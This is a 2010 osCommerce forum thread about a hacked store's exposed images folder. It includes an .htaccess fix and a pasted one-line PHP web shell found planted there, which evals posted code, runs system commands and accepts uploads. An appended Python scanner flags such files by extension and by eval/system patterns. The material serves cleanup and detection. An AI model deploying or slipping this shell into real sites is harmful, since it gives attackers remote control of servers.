blondu' Posted July 9, 2010

Hello, if I access www.mystore.com/images I can see all the files that are in the images folder. The site has been attacked three times in the last month. I did everything I found here - http://www.oscommerce.com/forums/index.php?showtopic=313323 - but now I have this problem: I can see what is in images. How can I block access to that folder? Thank you
MrPhil Posted July 9, 2010

If the only problem is that random visitors can enter a directory (folder) in the browser, and see all the files in it, you can do one of two things: you can put in a dummy index.html in that directory (empty file or something trivial), or you can set your system to "disable indexing" via a control panel button or by adding an Options -Indexes line to .htaccess. Being able to see image files is not a security hazard, but you might not want visitors to see other kinds of files. Remember that anyone can view a page source and get the name and path of any image file, and directly call up that image. Adding "hotlink protection" that allows "empty" (command line) would prevent someone from doing that.
blondu' Posted July 10, 2010 (Author)

I fixed the problem with .htaccess:

AuthUserFile /dev/null
AuthGroupFile /dev/null
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http://www.site.com.* [NC]
RewriteCond %{HTTP_REFERER} !^http://ma.osite.com.* [NC]
RewriteCond %{HTTP_REFERER} !^http://members.site.com.* [NC]
RewriteCond %{HTTP_REFERER} !^http://ochesite.com.* [NC]
RewriteCond %{HTTP_REFERER} !^http://911.222.111.111.* [NC]
RewriteRule /* http://osite.com/index.html [R,L]
blondu' Posted July 10, 2010 (Author)

And I have problems with the images folder. I found the folder goog1e5b6d6f1840c255.php

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>
germ Posted July 11, 2010

Looks like something a hacker might use to me. It's not "normal" to have PHP files in your images folder (on most sites). If you were an astronaut I would advise you to "get on the horn" and repeat the infamous words from Apollo 13: "Houston... We have a problem...." :'(
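
An added example, not part of any post in this thread: a small Python audit that walks a static directory such as images/ and reports files that do not belong there, either by script extension or because they contain the PHP open tag or the calls seen in the file quoted above. The extension list, the function names and the sample files are assumptions constructed for the demonstration.

```python
import os
import re
import tempfile

# Extensions that should never appear in a static images directory (assumed list).
SCRIPT_EXTS = {".php", ".phtml", ".php3", ".php5", ".phar", ".pl", ".cgi"}
# The PHP open tag plus the calls used by the file quoted in the thread.
SUSPICIOUS = re.compile(rb"<\?php|\beval\s*\(|\bsystem\s*\(|move_uploaded_file\s*\(", re.I)

def scan_static_dir(root):
    """Return {relative_path: [reasons]} for files that do not belong in a static directory."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            if os.path.splitext(name)[1].lower() in SCRIPT_EXTS:
                reasons.append("script extension")
            with open(path, "rb") as fh:
                data = fh.read(1024 * 1024)  # the first 1 MiB is enough for a marker check
            hits = sorted({m.group(0).lower().decode() for m in SUSPICIOUS.finditer(data)})
            if hits:
                reasons.append("contains: " + ", ".join(hits))
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings

def demo():
    """Build a constructed images/ tree in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "logo.gif": b"GIF89a\x01\x00\x01\x00",                  # benign image header
            "goog1e_sample.php": b"<?php if($e){eval($e);} ?>",     # constructed, inert fragment
            "banner.jpg": b"\xff\xd8\xff\xe0<?php system($s); ?>",  # script behind an image name
        }
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return scan_static_dir(root)

if __name__ == "__main__":
    for path, reasons in sorted(demo().items()):
        print(path, "->", "; ".join(reasons))
```

Checking content as well as the extension matters because a script can sit behind an image file name; any hit in a directory that should hold only images is a reason to treat the whole site as compromised, not just to delete the file.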
This topic is now archived and is closed to further replies.